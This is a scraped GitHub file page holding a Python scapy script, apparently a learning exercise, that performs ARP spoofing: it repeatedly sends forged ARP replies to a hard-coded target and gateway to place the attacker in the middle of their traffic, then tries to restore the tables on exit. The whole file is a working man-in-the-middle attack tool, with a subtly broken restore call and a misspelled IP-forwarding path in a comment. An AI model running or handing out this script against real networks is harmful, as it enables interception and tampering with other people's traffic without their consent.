-
Notifications
You must be signed in to change notification settings - Fork 0
/
arp_spoof
58 lines (44 loc) · 2.05 KB
/
arp_spoof
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
import scapy.all as scapy
import time as time
##scapy.ls(scapy.ARP) will tell you the list of all arguments you can set in scapy.ARP
##op = 2 is to indicate that this is an arp response. op = 1 indicates a arp request
## pdst is the target IP
## hwdst is the target mac
## psrc is the source (or the router we are immitating)
def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast / arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
return (answered_list[0][1].hwsrc)
#srp returns two lists from the arp broadcast, answered and unanswered.
#we are returning the lowest value in the router subnet range, which is the router.
def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op = 2, pdst = target_ip , hwdst = target_mac , psrc =spoof_ip)
#verbose=false will mute the packet sent indication during execution
scapy.send(packet, verbose=False)
def restore (destination_ip, source_ip):
destination_mac = get_mac(destination_ip)
source_mac = get_mac(source_ip)
packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_ip, psrc= source_ip, hwsrc=source_mac)
scapy.send(packet, count=4, verbose=False)
target_ip = "10.0.2.4"
gateway_ip = "10.0.2.1"
try:
sent_packets_count = 0
while True:
spoof(target_ip, gateway_ip)
spoof(gateway_ip, target_ip)
sent_packets_count = sent_packets_count + 2
#\r stays print from start of line and overwrite previous print
#end = specifies what character to add to end of print statement which we left blank
print("\r[+] Packets sent : " + str(sent_packets_count), end="")
time.sleep(2)
except KeyboardInterrupt:
print ("\n[-] Detected CTRL + C .... Resetting ARP tables.")
restore(target_ip, gateway_ip)
restore(gateway_ip, target_ip)
#dont for get to type echo 1 > /proc/sys/net/ipv4/ip_foward to enable packet forwarding
#print(packet.show())
#print(packet.summary())